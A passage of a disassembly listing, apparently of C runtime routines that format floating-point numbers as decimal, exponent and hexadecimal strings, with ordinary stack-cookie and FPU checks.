		cmp	byte ptr [eax],	30h
		jz	short loc_411150
		mov	eax, [edi+4]
		dec	eax
		jns	short loc_41112D
		neg	eax
		mov	byte ptr [esi],	2Dh

loc_41112D:				; CODE XREF: sub_411014+112j
		inc	esi
		cmp	eax, 64h
		jl	short loc_41113D
		cdq
		push	64h
		pop	edi
		idiv	edi
		add	[esi], al
		mov	eax, edx

loc_41113D:				; CODE XREF: sub_411014+11Dj
		inc	esi
		cmp	eax, 0Ah
		jl	short loc_41114D
		cdq
		push	0Ah
		pop	edi
		idiv	edi
		add	[esi], al
		mov	eax, edx

loc_41114D:				; CODE XREF: sub_411014+12Dj
		add	[esi+1], al

loc_411150:				; CODE XREF: sub_411014+10Cj
		test	byte_429084, 1
		jz	short loc_41116D
		cmp	byte ptr [ecx],	30h
		jnz	short loc_41116D
		push	3
		lea	eax, [ecx+1]
		push	eax
		push	ecx
		call	sub_407930
		add	esp, 0Ch

loc_41116D:				; CODE XREF: sub_411014+143j
					; sub_411014+148j
		cmp	[ebp+var_4], 0
		jz	short loc_41117A
		mov	eax, [ebp+var_8]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_41117A:				; CODE XREF: sub_411014+15Dj
		xor	eax, eax

loc_41117C:				; CODE XREF: sub_411014+42j
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn
sub_411014	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_411181	proc near		; CODE XREF: sub_41124F+14p
					; sub_411884+7Cp

var_2C		= dword	ptr -2Ch
var_1C		= byte ptr -1Ch
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h
arg_14		= dword	ptr  1Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 2Ch
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		mov	eax, [ebp+arg_0]
		push	ebx
		push	esi
		push	edi
		mov	edi, [ebp+arg_4]
		push	16h
		pop	esi
		push	esi
		lea	ecx, [ebp+var_1C]
		push	ecx
		lea	ecx, [ebp+var_2C]
		push	ecx
		push	dword ptr [eax+4]
		push	dword ptr [eax]
		call	sub_411D31
		xor	ebx, ebx
		add	esp, 14h
		cmp	edi, ebx
		jnz	short loc_4111D1

loc_4111B9:				; CODE XREF: sub_411181+55j
		call	sub_405D93
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		mov	[eax], esi
		call	sub_4034C7
		add	esp, 14h
		mov	eax, esi
		jmp	short loc_411240
; ---------------------------------------------------------------------------

loc_4111D1:				; CODE XREF: sub_411181+36j
		mov	eax, [ebp+arg_8]
		cmp	eax, ebx
		jbe	short loc_4111B9
		cmp	eax, 0FFFFFFFFh
		mov	esi, [ebp+arg_C]
		jnz	short loc_4111E5
		or	eax, 0FFFFFFFFh
		jmp	short loc_4111F9
; ---------------------------------------------------------------------------

loc_4111E5:				; CODE XREF: sub_411181+5Dj
		xor	ecx, ecx
		cmp	[ebp+var_2C], 2Dh
		setz	cl
		sub	eax, ecx
		xor	ecx, ecx
		cmp	esi, ebx
		setnle	cl
		sub	eax, ecx

loc_4111F9:				; CODE XREF: sub_411181+62j
		lea	ecx, [ebp+var_2C]
		push	ecx
		lea	ecx, [esi+1]
		push	ecx
		push	eax
		xor	eax, eax
		cmp	[ebp+var_2C], 2Dh
		setz	al
		xor	ecx, ecx
		cmp	esi, ebx
		setnle	cl
		add	eax, edi
		add	ecx, eax
		push	ecx
		call	sub_411BB9
		add	esp, 10h
		cmp	eax, ebx
		jz	short loc_411227
		mov	[edi], bl
		jmp	short loc_411240
; ---------------------------------------------------------------------------

loc_411227:				; CODE XREF: sub_411181+A0j
		push	[ebp+arg_14]
		lea	eax, [ebp+var_2C]
		push	ebx
		push	eax
		push	[ebp+arg_10]
		mov	eax, edi
		push	esi
		push	[ebp+arg_8]
		call	sub_411014
		add	esp, 18h

loc_411240:				; CODE XREF: sub_411181+4Ej
					; sub_411181+A4j
		mov	ecx, [ebp+var_4]
		pop	edi
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402C9E
		leave
		retn
sub_411181	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41124F	proc near		; CODE XREF: sub_41126D+BDp

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h

		push	ebp
		mov	ebp, esp
		push	0
		push	[ebp+arg_10]
		push	[ebp+arg_C]
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	sub_411181
		add	esp, 18h
		pop	ebp
		retn
sub_41124F	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41126D	proc near		; CODE XREF: sub_411884+63p

var_24		= dword	ptr -24h
var_1C		= dword	ptr -1Ch
var_18		= byte ptr -18h
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h
arg_14		= dword	ptr  1Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 24h
		push	esi
		push	edi
		push	[ebp+arg_14]
		lea	ecx, [ebp+var_24]
		mov	[ebp+var_14], 3FFh
		xor	edi, edi
		mov	[ebp+var_4], 30h
		call	sub_402CAD
		cmp	[ebp+arg_C], edi
		jge	short loc_411298
		mov	[ebp+arg_C], edi

loc_411298:				; CODE XREF: sub_41126D+26j
		mov	esi, [ebp+arg_4]
		cmp	esi, edi
		jnz	short loc_4112CA

loc_41129F:				; CODE XREF: sub_41126D+60j
		call	sub_405D93
		push	16h

loc_4112A6:				; CODE XREF: sub_41126D+77j
		pop	esi
		push	edi
		push	edi
		push	edi
		push	edi
		push	edi
		mov	[eax], esi
		call	sub_4034C7
		add	esp, 14h
		cmp	[ebp+var_18], 0
		jz	short loc_4112C3
		mov	eax, [ebp+var_1C]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_4112C3:				; CODE XREF: sub_41126D+4Dj
		mov	eax, esi
		jmp	loc_4115DA
; ---------------------------------------------------------------------------

loc_4112CA:				; CODE XREF: sub_41126D+30j
		cmp	[ebp+arg_8], edi
		jbe	short loc_41129F
		mov	eax, [ebp+arg_C]
		add	eax, 0Bh
		cmp	[ebp+arg_8], eax
		mov	byte ptr [esi],	0
		ja	short loc_4112E6
		call	sub_405D93
		push	22h
		jmp	short loc_4112A6
; ---------------------------------------------------------------------------

loc_4112E6:				; CODE XREF: sub_41126D+6Ej
		mov	edi, [ebp+arg_0]
		mov	eax, [edi]
		mov	[ebp+var_C], eax
		mov	eax, [edi+4]
		mov	ecx, eax
		shr	ecx, 14h
		mov	edx, 7FFh
		push	ebx
		and	ecx, edx
		xor	ebx, ebx
		cmp	ecx, edx
		jnz	loc_411398
		test	ebx, ebx
		jnz	loc_411398
		mov	eax, [ebp+arg_8]
		cmp	eax, 0FFFFFFFFh
		jnz	short loc_41131C
		or	eax, eax
		jmp	short loc_41131F
; ---------------------------------------------------------------------------

loc_41131C:				; CODE XREF: sub_41126D+A9j
		add	eax, 0FFFFFFFEh

loc_41131F:				; CODE XREF: sub_41126D+ADj
		push	0
		push	[ebp+arg_C]
		lea	ebx, [esi+2]
		push	eax
		push	ebx
		push	edi
		call	sub_41124F
		add	esp, 14h
		test	eax, eax
		jz	short loc_41134F
		cmp	[ebp+var_18], 0
		mov	byte ptr [esi],	0
		jz	loc_4115D9
		mov	ecx, [ebp+var_1C]
		and	dword ptr [ecx+70h], 0FFFFFFFDh
		jmp	loc_4115D9
; ---------------------------------------------------------------------------

loc_41134F:				; CODE XREF: sub_41126D+C7j
		cmp	byte ptr [ebx],	2Dh
		jnz	short loc_411358
		mov	byte ptr [esi],	2Dh
		inc	esi

loc_411358:				; CODE XREF: sub_41126D+E5j
		mov	byte ptr [esi],	30h
		inc	esi
		cmp	[ebp+arg_10], 0
		push	65h
		setz	al
		dec	al
		and	al, 0E0h
		add	al, 78h
		mov	[esi], al
		inc	esi
		push	esi
		call	sub_411A40
		test	eax, eax
		pop	ecx
		pop	ecx
		jz	loc_4115CA
		cmp	[ebp+arg_10], 0
		setz	cl
		dec	cl
		and	cl, 0E0h
		add	cl, 70h
		mov	[eax], cl
		mov	byte ptr [eax+3], 0
		jmp	loc_4115CA
; ---------------------------------------------------------------------------

loc_411398:				; CODE XREF: sub_41126D+95j
					; sub_41126D+9Dj
		and	eax, 80000000h
		xor	ecx, ecx
		or	ecx, eax
		jz	short loc_4113A7
		mov	byte ptr [esi],	2Dh
		inc	esi

loc_4113A7:				; CODE XREF: sub_41126D+134j
		mov	ebx, [ebp+arg_10]
		mov	byte ptr [esi],	30h
		inc	esi
		test	ebx, ebx
		setz	al
		dec	al
		and	al, 0E0h
		add	al, 78h
		mov	[esi], al
		mov	ecx, [edi+4]
		inc	esi
		neg	ebx
		sbb	ebx, ebx
		and	ebx, 0FFFFFFE0h
		and	ecx, 7FF00000h
		xor	eax, eax
		add	ebx, 27h
		xor	edx, edx
		or	eax, ecx
		jnz	short loc_4113F8
		mov	byte ptr [esi],	30h
		mov	ecx, [edi+4]
		mov	eax, [edi]
		and	ecx, 0FFFFFh
		inc	esi
		or	eax, ecx
		jnz	short loc_4113EF
		mov	[ebp+var_14], edx
		jmp	short loc_4113FC
; ---------------------------------------------------------------------------

loc_4113EF:				; CODE XREF: sub_41126D+17Bj
		mov	[ebp+var_14], 3FEh
		jmp	short loc_4113FC
; ---------------------------------------------------------------------------

loc_4113F8:				; CODE XREF: sub_41126D+168j
		mov	byte ptr [esi],	31h
		inc	esi

loc_4113FC:				; CODE XREF: sub_41126D+180j
					; sub_41126D+189j
		mov	eax, esi
		inc	esi
		cmp	[ebp+arg_C], edx
		mov	[ebp+arg_4], eax
		jnz	short loc_41140B
		mov	[eax], dl
		jmp	short loc_41141A
; ---------------------------------------------------------------------------

loc_41140B:				; CODE XREF: sub_41126D+198j
		mov	ecx, [ebp+var_24]
		mov	ecx, [ecx+0BCh]
		mov	ecx, [ecx]
		mov	cl, [ecx]
		mov	[eax], cl

loc_41141A:				; CODE XREF: sub_41126D+19Cj
		mov	ecx, [edi+4]
		mov	eax, [edi]
		and	ecx, 0FFFFFh
		mov	[ebp+var_8], ecx
		ja	short loc_411432
		cmp	eax, edx
		jbe	loc_4114E7

loc_411432:				; CODE XREF: sub_41126D+1BBj
		mov	[ebp+var_C], edx
		mov	[ebp+var_8], 0F0000h

loc_41143C:				; CODE XREF: sub_41126D+220j
		cmp	[ebp+arg_C], 0
		jle	short loc_41148F
		mov	edx, [edi+4]
		and	edx, [ebp+var_8]
		mov	eax, [edi]
		movsx	ecx, word ptr [ebp+var_4]
		and	eax, [ebp+var_C]
		and	edx, 0FFFFFh
		call	sub_411EA0
		add	ax, 30h
		movzx	eax, ax
		cmp	ax, 39h
		jbe	short loc_41146B
		add	eax, ebx

loc_41146B:				; CODE XREF: sub_41126D+1FAj
		mov	ecx, [ebp+var_8]
		sub	[ebp+var_4], 4
		mov	[esi], al
		mov	eax, [ebp+var_C]
		shrd	eax, ecx, 4
		shr	ecx, 4
		inc	esi
		dec	[ebp+arg_C]
		cmp	word ptr [ebp+var_4], 0
		mov	[ebp+var_C], eax
		mov	[ebp+var_8], ecx
		jge	short loc_41143C

loc_41148F:				; CODE XREF: sub_41126D+1D3j
		cmp	word ptr [ebp+var_4], 0
		jl	short loc_4114E7
		mov	edx, [edi+4]
		and	edx, [ebp+var_8]
		mov	eax, [edi]
		movsx	ecx, word ptr [ebp+var_4]
		and	eax, [ebp+var_C]
		and	edx, 0FFFFFh
		call	sub_411EA0
		cmp	ax, 8
		jbe	short loc_4114E7
		lea	eax, [esi-1]

loc_4114B9:				; CODE XREF: sub_41126D+25Cj
		mov	cl, [eax]
		cmp	cl, 66h
		jz	short loc_4114C5
		cmp	cl, 46h
		jnz	short loc_4114CB

loc_4114C5:				; CODE XREF: sub_41126D+251j
		mov	byte ptr [eax],	30h
		dec	eax
		jmp	short loc_4114B9
; ---------------------------------------------------------------------------

loc_4114CB:				; CODE XREF: sub_41126D+256j
		cmp	eax, [ebp+arg_4]
		jz	short loc_4114E4
		mov	cl, [eax]
		cmp	cl, 39h
		jnz	short loc_4114DE
		add	bl, 3Ah
		mov	[eax], bl
		jmp	short loc_4114E7
; ---------------------------------------------------------------------------

loc_4114DE:				; CODE XREF: sub_41126D+268j
		inc	cl
		mov	[eax], cl
		jmp	short loc_4114E7
; ---------------------------------------------------------------------------

loc_4114E4:				; CODE XREF: sub_41126D+261j
		inc	byte ptr [eax-1]

loc_4114E7:				; CODE XREF: sub_41126D+1BFj
					; sub_41126D+227j ...
		cmp	[ebp+arg_C], 0
		jle	short loc_4114FE
		push	[ebp+arg_C]
		push	30h
		push	esi
		call	sub_408130
		add	esp, 0Ch
		add	esi, [ebp+arg_C]

loc_4114FE:				; CODE XREF: sub_41126D+27Ej
		mov	eax, [ebp+arg_4]
		cmp	byte ptr [eax],	0
		jnz	short loc_411508
		mov	esi, eax

loc_411508:				; CODE XREF: sub_41126D+297j
		cmp	[ebp+arg_10], 0
		mov	cl, 34h
		setz	al
		dec	al
		and	al, 0E0h
		add	al, 70h
		mov	[esi], al
		mov	eax, [edi]
		mov	edx, [edi+4]
		inc	esi
		call	sub_411EA0
		xor	ebx, ebx
		and	eax, 7FFh
		and	edx, ebx
		sub	eax, [ebp+var_14]
		push	ebx
		pop	ecx
		sbb	edx, ecx
		js	short loc_411542
		jg	short loc_41153C
		cmp	eax, ebx
		jb	short loc_411542

loc_41153C:				; CODE XREF: sub_41126D+2C9j
		mov	byte ptr [esi],	2Bh
		inc	esi
		jmp	short loc_41154C
; ---------------------------------------------------------------------------

loc_411542:				; CODE XREF: sub_41126D+2C7j
					; sub_41126D+2CDj
		mov	byte ptr [esi],	2Dh
		inc	esi
		neg	eax
		adc	edx, ebx
		neg	edx

loc_41154C:				; CODE XREF: sub_41126D+2D3j
		cmp	edx, ebx
		mov	edi, esi
		mov	byte ptr [esi],	30h
		jl	short loc_411579
		mov	ecx, 3E8h
		jg	short loc_411560
		cmp	eax, ecx
		jb	short loc_411579

loc_411560:				; CODE XREF: sub_41126D+2EDj
		push	ebx
		push	ecx
		push	edx
		push	eax
		call	sub_411DC0
		add	al, 30h
		mov	[esi], al
		inc	esi
		cmp	esi, edi
		mov	[ebp+var_10], edx
		mov	eax, ecx
		mov	edx, ebx
		jnz	short loc_411584

loc_411579:				; CODE XREF: sub_41126D+2E6j
					; sub_41126D+2F1j
		test	edx, edx
		jl	short loc_41159B
		jg	short loc_411584
		cmp	eax, 64h
		jb	short loc_41159B

loc_411584:				; CODE XREF: sub_41126D+30Aj
					; sub_41126D+310j
		push	0
		push	64h
		push	edx
		push	eax
		call	sub_411DC0
		add	al, 30h
		mov	[esi], al
		mov	[ebp+var_10], edx
		inc	esi
		mov	eax, ecx
		mov	edx, ebx

loc_41159B:				; CODE XREF: sub_41126D+30Ej
					; sub_41126D+315j
		cmp	esi, edi
		jnz	short loc_4115AA
		test	edx, edx
		jl	short loc_4115C2
		jg	short loc_4115AA
		cmp	eax, 0Ah
		jb	short loc_4115C2

loc_4115AA:				; CODE XREF: sub_41126D+330j
					; sub_41126D+336j
		push	0
		push	0Ah
		push	edx
		push	eax
		call	sub_411DC0
		add	al, 30h
		mov	[esi], al
		mov	[ebp+var_10], edx
		inc	esi
		mov	eax, ecx
		mov	[ebp+var_10], ebx

loc_4115C2:				; CODE XREF: sub_41126D+334j
					; sub_41126D+33Bj
		add	al, 30h
		mov	[esi], al
		mov	byte ptr [esi+1], 0

loc_4115CA:				; CODE XREF: sub_41126D+10Bj
					; sub_41126D+126j
		cmp	[ebp+var_18], 0
		jz	short loc_4115D7
		mov	eax, [ebp+var_1C]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_4115D7:				; CODE XREF: sub_41126D+361j
		xor	eax, eax

loc_4115D9:				; CODE XREF: sub_41126D+D0j
					; sub_41126D+DDj
		pop	ebx

loc_4115DA:				; CODE XREF: sub_41126D+58j
		pop	edi
		pop	esi
		leave
		retn
sub_41126D	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4115DE	proc near		; CODE XREF: sub_4116D3+A2p
					; sub_41178C+C3p

var_10		= dword	ptr -10h
var_8		= dword	ptr -8
var_4		= byte ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= byte ptr  10h
arg_C		= dword	ptr  14h

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		push	ebx
		push	esi
		push	edi
		push	[ebp+arg_C]
		mov	ebx, eax
		mov	esi, [ebx+4]
		mov	edi, ecx
		lea	ecx, [ebp+var_10]
		dec	esi
		call	sub_402CAD
		test	edi, edi
		jnz	short loc_41162B

loc_4115FE:				; CODE XREF: sub_4115DE+51j
		call	sub_405D93
		push	16h
		pop	esi
		mov	[eax], esi
		xor	eax, eax
		push	eax
		push	eax
		push	eax
		push	eax
		push	eax
		call	sub_4034C7
		add	esp, 14h
		cmp	[ebp+var_4], 0
		jz	short loc_411624
		mov	eax, [ebp+var_8]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_411624:				; CODE XREF: sub_4115DE+3Dj
		mov	eax, esi
		jmp	loc_4116CE
; ---------------------------------------------------------------------------

loc_41162B:				; CODE XREF: sub_4115DE+1Ej
		cmp	[ebp+arg_0], 0
		jbe	short loc_4115FE
		cmp	[ebp+arg_8], 0
		jz	short loc_41164F
		cmp	esi, [ebp+arg_4]
		jnz	short loc_41164F
		xor	eax, eax
		cmp	dword ptr [ebx], 2Dh
		setz	al
		add	eax, esi
		add	eax, edi
		mov	byte ptr [eax],	30h
		mov	byte ptr [eax+1], 0

loc_41164F:				; CODE XREF: sub_4115DE+57j
					; sub_4115DE+5Cj
		cmp	dword ptr [ebx], 2Dh
		mov	esi, edi
		jnz	short loc_41165C
		mov	byte ptr [edi],	2Dh
		lea	esi, [edi+1]

loc_41165C:				; CODE XREF: sub_4115DE+76j
		mov	eax, [ebx+4]
		xor	edi, edi
		inc	edi
		test	eax, eax
		jg	short loc_411673
		mov	eax, esi
		call	sub_410FDB
		mov	byte ptr [esi],	30h
		inc	esi
		jmp	short loc_411675
; ---------------------------------------------------------------------------

loc_411673:				; CODE XREF: sub_4115DE+86j
		add	esi, eax

loc_411675:				; CODE XREF: sub_4115DE+93j
		cmp	[ebp+arg_4], 0
		jle	short loc_4116BF
		mov	eax, esi
		call	sub_410FDB
		mov	eax, [ebp+var_10]
		mov	eax, [eax+0BCh]
		mov	eax, [eax]
		mov	al, [eax]
		mov	[esi], al
		mov	ebx, [ebx+4]
		inc	esi
		test	ebx, ebx
		jge	short loc_4116BF
		neg	ebx
		cmp	[ebp+arg_8], 0
		jnz	short loc_4116A6
		cmp	[ebp+arg_4], ebx
		jl	short loc_4116A9

loc_4116A6:				; CODE XREF: sub_4115DE+C1j
		mov	[ebp+arg_4], ebx

loc_4116A9:				; CODE XREF: sub_4115DE+C6j
		mov	edi, [ebp+arg_4]
		mov	eax, esi
		call	sub_410FDB
		push	edi
		push	30h
		push	esi
		call	sub_408130
		add	esp, 0Ch

loc_4116BF:				; CODE XREF: sub_4115DE+9Bj
					; sub_4115DE+B9j
		cmp	[ebp+var_4], 0
		jz	short loc_4116CC
		mov	eax, [ebp+var_8]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_4116CC:				; CODE XREF: sub_4115DE+E5j
		xor	eax, eax

loc_4116CE:				; CODE XREF: sub_4115DE+48j
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn
sub_4115DE	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4116D3	proc near		; CODE XREF: sub_411884+24p

var_2C		= dword	ptr -2Ch
var_28		= dword	ptr -28h
var_1C		= byte ptr -1Ch
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h

		push	ebp
		mov	ebp, esp
		sub	esp, 2Ch
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		mov	eax, [ebp+arg_0]
		push	ebx
		push	esi
		push	edi
		mov	edi, [ebp+arg_4]
		push	16h
		pop	esi
		push	esi
		lea	ecx, [ebp+var_1C]
		push	ecx
		lea	ecx, [ebp+var_2C]
		push	ecx
		push	dword ptr [eax+4]
		push	dword ptr [eax]
		call	sub_411D31
		xor	ebx, ebx
		add	esp, 14h
		cmp	edi, ebx
		jnz	short loc_411723

loc_41170B:				; CODE XREF: sub_4116D3+55j
		call	sub_405D93
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		mov	[eax], esi
		call	sub_4034C7
		add	esp, 14h
		mov	eax, esi
		jmp	short loc_41177D
; ---------------------------------------------------------------------------

loc_411723:				; CODE XREF: sub_4116D3+36j
		mov	eax, [ebp+arg_8]
		cmp	eax, ebx
		jbe	short loc_41170B
		cmp	eax, 0FFFFFFFFh
		jnz	short loc_411733
		or	eax, eax
		jmp	short loc_41173E
; ---------------------------------------------------------------------------

loc_411733:				; CODE XREF: sub_4116D3+5Aj
		xor	ecx, ecx
		cmp	[ebp+var_2C], 2Dh
		setz	cl
		sub	eax, ecx

loc_41173E:				; CODE XREF: sub_4116D3+5Ej
		mov	esi, [ebp+arg_C]
		lea	ecx, [ebp+var_2C]
		push	ecx
		mov	ecx, [ebp+var_28]
		add	ecx, esi
		push	ecx
		push	eax
		xor	eax, eax
		cmp	[ebp+var_2C], 2Dh
		setz	al
		add	eax, edi
		push	eax
		call	sub_411BB9
		add	esp, 10h
		cmp	eax, ebx
		jz	short loc_411768
		mov	[edi], bl
		jmp	short loc_41177D
; ---------------------------------------------------------------------------

loc_411768:				; CODE XREF: sub_4116D3+8Fj
		push	[ebp+arg_10]
		lea	eax, [ebp+var_2C]
		push	ebx
		push	esi
		push	[ebp+arg_8]
		mov	ecx, edi
		call	sub_4115DE
		add	esp, 10h

loc_41177D:				; CODE XREF: sub_4116D3+4Ej
					; sub_4116D3+93j
		mov	ecx, [ebp+var_4]
		pop	edi
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402C9E
		leave
		retn
sub_4116D3	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41178C	proc near		; CODE XREF: sub_411884+4Ap

var_30		= dword	ptr -30h
var_2C		= dword	ptr -2Ch
var_20		= dword	ptr -20h
var_1C		= byte ptr -1Ch
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h
arg_14		= dword	ptr  1Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 30h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		mov	eax, [ebp+arg_0]
		push	ebx
		push	esi
		mov	esi, [ebp+arg_4]
		push	edi
		push	16h
		pop	edi
		push	edi
		lea	ecx, [ebp+var_1C]
		push	ecx
		lea	ecx, [ebp+var_30]
		push	ecx
		push	dword ptr [eax+4]
		push	dword ptr [eax]
		call	sub_411D31
		xor	ebx, ebx
		add	esp, 14h
		cmp	esi, ebx
		jnz	short loc_4117DF

loc_4117C4:				; CODE XREF: sub_41178C+58j
		call	sub_405D93
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		mov	[eax], edi
		call	sub_4034C7
		add	esp, 14h
		mov	eax, edi
		jmp	loc_411875
; ---------------------------------------------------------------------------

loc_4117DF:				; CODE XREF: sub_41178C+36j
		mov	ecx, [ebp+arg_8]
		cmp	ecx, ebx
		jbe	short loc_4117C4
		mov	eax, [ebp+var_2C]
		dec	eax
		mov	[ebp+var_20], eax
		xor	eax, eax
		cmp	[ebp+var_30], 2Dh
		setz	al
		cmp	ecx, 0FFFFFFFFh
		lea	edi, [eax+esi]
		jnz	short loc_411802
		or	ecx, ecx
		jmp	short loc_411804
; ---------------------------------------------------------------------------

loc_411802:				; CODE XREF: sub_41178C+70j
		sub	ecx, eax

loc_411804:				; CODE XREF: sub_41178C+74j
		lea	eax, [ebp+var_30]
		push	eax
		push	[ebp+arg_C]
		push	ecx
		push	edi
		call	sub_411BB9
		add	esp, 10h
		cmp	eax, ebx
		jz	short loc_41181D
		mov	[esi], bl
		jmp	short loc_411875
; ---------------------------------------------------------------------------

loc_41181D:				; CODE XREF: sub_41178C+8Bj
		mov	eax, [ebp+var_2C]
		dec	eax
		cmp	[ebp+var_20], eax
		setl	cl
		cmp	eax, 0FFFFFFFCh
		jl	short loc_411859
		cmp	eax, [ebp+arg_C]
		jge	short loc_411859
		cmp	cl, bl
		jz	short loc_41183F

loc_411835:				; CODE XREF: sub_41178C+AEj
		mov	al, [edi]
		inc	edi
		test	al, al
		jnz	short loc_411835
		mov	[edi-2], bl

loc_41183F:				; CODE XREF: sub_41178C+A7j
		push	[ebp+arg_14]
		lea	eax, [ebp+var_30]
		push	1
		push	[ebp+arg_C]
		mov	ecx, esi
		push	[ebp+arg_8]
		call	sub_4115DE
		add	esp, 10h
		jmp	short loc_411875
; ---------------------------------------------------------------------------

loc_411859:				; CODE XREF: sub_41178C+9Ej
					; sub_41178C+A3j
		push	[ebp+arg_14]
		lea	eax, [ebp+var_30]
		push	1
		push	eax
		push	[ebp+arg_10]
		mov	eax, esi
		push	[ebp+arg_C]
		push	[ebp+arg_8]
		call	sub_411014
		add	esp, 18h

loc_411875:				; CODE XREF: sub_41178C+4Ej
					; sub_41178C+8Fj ...
		mov	ecx, [ebp+var_4]
		pop	edi
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402C9E
		leave
		retn
sub_41178C	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_411884	proc near		; CODE XREF: sub_41190A+17p
					; DATA XREF: sub_40FCCB+37o ...

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h
arg_14		= dword	ptr  1Ch
arg_18		= dword	ptr  20h

		push	ebp
		mov	ebp, esp
		mov	eax, [ebp+arg_C]
		cmp	eax, 65h
		jz	short loc_4118EE
		cmp	eax, 45h
		jz	short loc_4118EE
		cmp	eax, 66h
		jnz	short loc_4118B2
		push	[ebp+arg_18]
		push	[ebp+arg_10]
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	sub_4116D3
		add	esp, 14h
		pop	ebp
		retn
; ---------------------------------------------------------------------------

loc_4118B2:				; CODE XREF: sub_411884+13j
		cmp	eax, 61h
		jz	short loc_4118D5
		cmp	eax, 41h
		jz	short loc_4118D5
		push	[ebp+arg_18]
		push	[ebp+arg_14]
		push	[ebp+arg_10]
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	sub_41178C
		jmp	short loc_411905
; ---------------------------------------------------------------------------

loc_4118D5:				; CODE XREF: sub_411884+31j
					; sub_411884+36j
		push	[ebp+arg_18]
		push	[ebp+arg_14]
		push	[ebp+arg_10]
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	sub_41126D
		jmp	short loc_411905
; ---------------------------------------------------------------------------

loc_4118EE:				; CODE XREF: sub_411884+9j
					; sub_411884+Ej
		push	[ebp+arg_18]
		push	[ebp+arg_14]
		push	[ebp+arg_10]
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	sub_411181

loc_411905:				; CODE XREF: sub_411884+4Fj
					; sub_411884+68j
		add	esp, 18h
		pop	ebp
		retn
sub_411884	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41190A	proc near		; DATA XREF: sub_40FCCBo
					; .data:off_424F80o ...

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h
arg_14		= dword	ptr  1Ch

		push	ebp
		mov	ebp, esp
		push	0
		push	[ebp+arg_14]
		push	[ebp+arg_10]
		push	[ebp+arg_C]
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	sub_411884
		add	esp, 1Ch
		pop	ebp
		retn
sub_41190A	endp


; =============== S U B	R O U T	I N E =======================================



sub_41192B	proc near		; CODE XREF: sub_40FD2B+16p
		push	esi
		push	30000h
		push	10000h
		xor	esi, esi
		push	esi
		call	sub_411EBF
		add	esp, 0Ch
		test	eax, eax
		jz	short loc_411952
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		call	sub_4033CB
		add	esp, 14h

loc_411952:				; CODE XREF: sub_41192B+18j
		pop	esi
		retn
sub_41192B	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_411954	proc near		; CODE XREF: sub_411990:loc_4119B4j

var_18		= qword	ptr -18h
var_10		= qword	ptr -10h
var_8		= qword	ptr -8

		push	ebp
		mov	ebp, esp
		sub	esp, 18h
		fld	ds:dbl_41FE90
		fstp	[ebp+var_10]
		fld	ds:dbl_41FE88
		fstp	[ebp+var_18]
		fld	[ebp+var_18]
		fdiv	[ebp+var_10]
		fmul	[ebp+var_10]
		fsubr	[ebp+var_18]
		fstp	[ebp+var_8]
		fld1
		fcomp	[ebp+var_8]
		fnstsw	ax
		test	ah, 5
